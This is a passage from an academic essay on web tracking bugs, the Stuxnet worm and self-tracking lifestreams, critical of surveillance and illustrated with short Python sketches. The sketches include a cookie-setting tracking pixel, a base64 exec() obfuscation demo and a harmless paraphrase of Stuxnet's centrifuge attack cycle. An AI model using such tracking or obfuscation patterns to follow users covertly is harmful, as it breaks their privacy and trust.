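class TrackingPixel(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = self.headers.get('Cookie')          # returning visitor?
        uid = cookie.split('=', 1)[1] if cookie else uuid.uuid4().hex
        # Server-side log: which user requested the pixel, and from which page
        print('user', uid, 'referer', self.headers.get('Referer'))
        self.send_response(200)
        if not cookie:
            # First visit: secrete an identifier onto the visitor's machine
            self.send_header('Set-Cookie', 'uid=' + uid)
        self.send_header('Content-Type', 'image/gif')
        self.end_headers()
        # A real tracker would return a valid 1x1 transparent GIF here
        self.wfile.write(b'GIF89a')

HTTPServer(('', 8080), TrackingPixel).serve_forever()
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Embedded in a page as a one-pixel image, every page view triggers a request to such an endpoint, and the cookie makes each subsequent request linkable to the first: state management repurposed as surveillance. &lt;br /&gt;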
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] In the Ghostery log, for instance, the [http://chartbeat.com/ ChartBeat company] is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the user’s knowledge; code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any)&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation: a programming technique that reduces the readability of code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the ChartBeat web bug, such as the fact that it has been found on over 100,000 websites across the Internet and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked&amp;quot;' (Madrigal, 2012). &lt;br /&gt;
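&lt;br /&gt;
The effect of such obfuscation is easy to illustrate. The following contrived Python fragment (real web bugs use minified JavaScript; this example is mine and is not drawn from any actual tracker) performs exactly the same action in a readable and an opaque form: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import base64

# The readable form of some (pretend) tracking logic:
src = 'print(2 + 2)'

# The shipped form: the same logic as an opaque base64 blob,
# which resists casual reading while running identically.
blob = base64.b64encode(src.encode())
exec(base64.b64decode(blob))
&amp;lt;/pre&amp;gt; &lt;br /&gt;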
&lt;br /&gt;
These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As these relative frequencies show, Google is by a long distance the biggest player in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor is worth $189 at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 at [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) generates only $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1. '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Advertiser: A company sponsoring advertisements and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b. Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media] &lt;br /&gt;
*c. Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d. Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2. '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b. Offline Data Aggregator: Collects data from a range of offline sources and provides it to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c. Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d. Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e. Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f. Retargeter: Providers of technologies that allow publishers to identify their visitors when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3. '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a. Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b. Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges. SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c. Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d. Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4. '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b. Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising] &lt;br /&gt;
&lt;br /&gt;
[[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &lt;br /&gt;
''Image 1: Display Advertising Technology Landscape (Luma, 2010)'' &lt;br /&gt;
&lt;br /&gt;
Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010).&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Of course, one element missing from this typology is surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it was ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers the user little in the way of diagnosis or even warnings. The industry itself, which prefers the term ‘clear GIF’ to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the ‘do not track’ flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the ‘do not track’ header, and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). In this context one can also see the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). &lt;br /&gt;
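&lt;br /&gt;
For reference, the ‘do not track’ flag itself is technically trivial: it is a single HTTP request header, as this minimal Python sketch shows (the URL is a placeholder). Whether anything happens as a result is entirely at the server’s discretion, which is precisely the regulatory problem: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A client declaring the 'do not track' preference: one header, no enforcement.
import urllib.request

req = urllib.request.Request('http://example.com/',
                             headers={'DNT': '1'})  # 1 = user opts out of tracking
with urllib.request.urlopen(req) as response:
    print(response.status)  # the server may, but need not, honour the header
&amp;lt;/pre&amp;gt; &lt;br /&gt;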
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in the use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of Americans said they would 'not be okay' with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be 'okay' with tracking (because it would lead to better and more personalized search results)… Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data, which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are simply not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device whilst giving the user the impression that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and then activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second, 'xnet', from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection, and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’, because it fakes industrial process control sensor signals so that an infected system does not exhibit abnormal behaviour and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage effort, and in a targeted way, through the fatiguing of the motors; this looks like standard failure rather than attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
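&lt;br /&gt;
The logic of the attack sequence that Zetter describes can be paraphrased in a few lines of code. The following Python sketch is purely illustrative: it is a reconstruction of the published description, not Stuxnet’s actual code, and the function names are mine: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
NOMINAL = 1064   # Hz: normal IR-1 drive frequency reported by Zetter (2011)

def wait(**period):
    pass   # stand-in for elapsed plant time; a no-op in this sketch

def set_frequency(hz):
    print('drive frequency set to', hz, 'Hz')

def replay_recorded_readings():
    # The man-in-the-middle step: operators see previously recorded
    # 'normal' sensor data while the real frequencies are being changed.
    print('replaying recorded sensor data to the control room')

def attack_cycle():
    replay_recorded_readings()
    set_frequency(1410)        # near the rotor's mechanical limit
    wait(minutes=15)
    set_frequency(NOMINAL)     # restored before the rotor breaks apart
    wait(days=27)              # long dormancy between excursions
    replay_recorded_readings()
    set_frequency(2)           # then almost stopped, for 50 minutes
    wait(minutes=50)
    set_frequency(NOMINAL)
    wait(days=27)              # and the cycle repeats

attack_cycle()
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The point of the sketch is the shape of the behaviour: brief, damaging excursions separated by weeks of normality, with the interface systematically decoupled from the machine. &lt;br /&gt;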
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in testing such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexity and structure of the worm are such that at least thirty people would have had to work on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality, it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did’ (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet were: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and provide a stealth infection into the computer system that would fool the operators of the plant (the man-in-the-middle attack described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures, while the larger, 417, manipulated valves in the centrifuges, faking industrial process control sensor signals by modelling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010, and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The origin of the name Stuxnet has also been hypothesised from an analysis of the approximately 15,000 lines of programming code. This analysis was a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel must have been involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran - 52.2% &lt;br /&gt;
**Indonesia - 17.4% &lt;br /&gt;
**India - 11.3% &lt;br /&gt;
**Pakistan - 3.6% &lt;br /&gt;
**Uzbekistan - 2.6% &lt;br /&gt;
**Russia - 2.1% &lt;br /&gt;
**Kazakhstan - 1.3% &lt;br /&gt;
**Rest of World - 9.4% &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Clearly, this kind of attack could be mobilised against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants show that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and learn, in a very short time, techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The increased ability of software and code, via computational devices, covertly to monitor, control and mediate, both positively and negatively, is not just a matter of interventions that deceive the human and non-human actors who make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, that forms part of the notion of lifestreams, and more particularly of the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
These self-monitoring technologies are known as lifestreaming, or the quantified self.[11] They have expanded in recent years alongside the growth of ‘real-time streams’ platforms such as Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Lifestreams were originally an idea of David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its short, text-message-sized, 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect personal data systematically, starting in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
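&lt;br /&gt;
Freeman’s description translates almost directly into a data structure. The following minimal Python sketch (the class and operator names are mine, not those of the original Lifestreams system) captures the core idea of a single time-ordered stream plus a filter operator that produces substreams on demand: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
from dataclasses import dataclass, field
from datetime import datetime

@dataclass(order=True)
class Document:
    timestamp: datetime                   # the stream is ordered by time alone
    kind: str = field(compare=False)      # mail, photo, bill, reminder, ...
    content: str = field(compare=False)

class Lifestream:
    def __init__(self):
        self.docs = []

    def store(self, doc):
        self.docs.append(doc)             # every document lands in one stream
        self.docs.sort()                  # tail = past, head = present/future

    def substream(self, predicate):
        # The filter operator: organise information on demand, not in folders
        return [d for d in self.docs if predicate(d)]

stream = Lifestream()
stream.store(Document(datetime(2012, 3, 1), 'mail', 'Re: seminar'))
stream.store(Document(datetime(2012, 3, 9), 'reminder', 'Submit chapter'))
print(stream.substream(lambda d: d.kind == 'reminder'))
&amp;lt;/pre&amp;gt; &lt;br /&gt;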
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent, and in the context of reflexivity and self-knowledge it raises interesting questions: not least, who owns and has access to these intimate personal archives, and how does constant self-measurement change the self that is being measured? The scale of the data collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile ‘apps’ - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, such services are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry common in smartphones, to log GPS location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed (see the sketch after the quotation below): &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis) &lt;br /&gt;
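&lt;br /&gt;
As a sketch of what this looks like in practice, the following Python fragment builds an activity in the spirit of the JSON Activity Streams 1.0 example quoted above; the field values are invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import json

# 'Geraldine posted a photo to her album', as actor/verb/object/target
activity = {
    'published': '2012-03-04T12:00:00Z',
    'actor':  {'objectType': 'person', 'displayName': 'Geraldine'},
    'verb':   'post',
    'object': {'objectType': 'photo', 'url': 'http://example.org/photos/1'},
    'target': {'objectType': 'photo-album', 'displayName': 'Holiday'},
}

# Once serialised, the activity can be transmitted, aggregated and searched
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;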
&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualised, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case - in other words, for the individual user (or lifestreamer) as for the organisation (such as Facebook) - the key is to pattern-match and compare details of the data, whether against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
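&lt;br /&gt;
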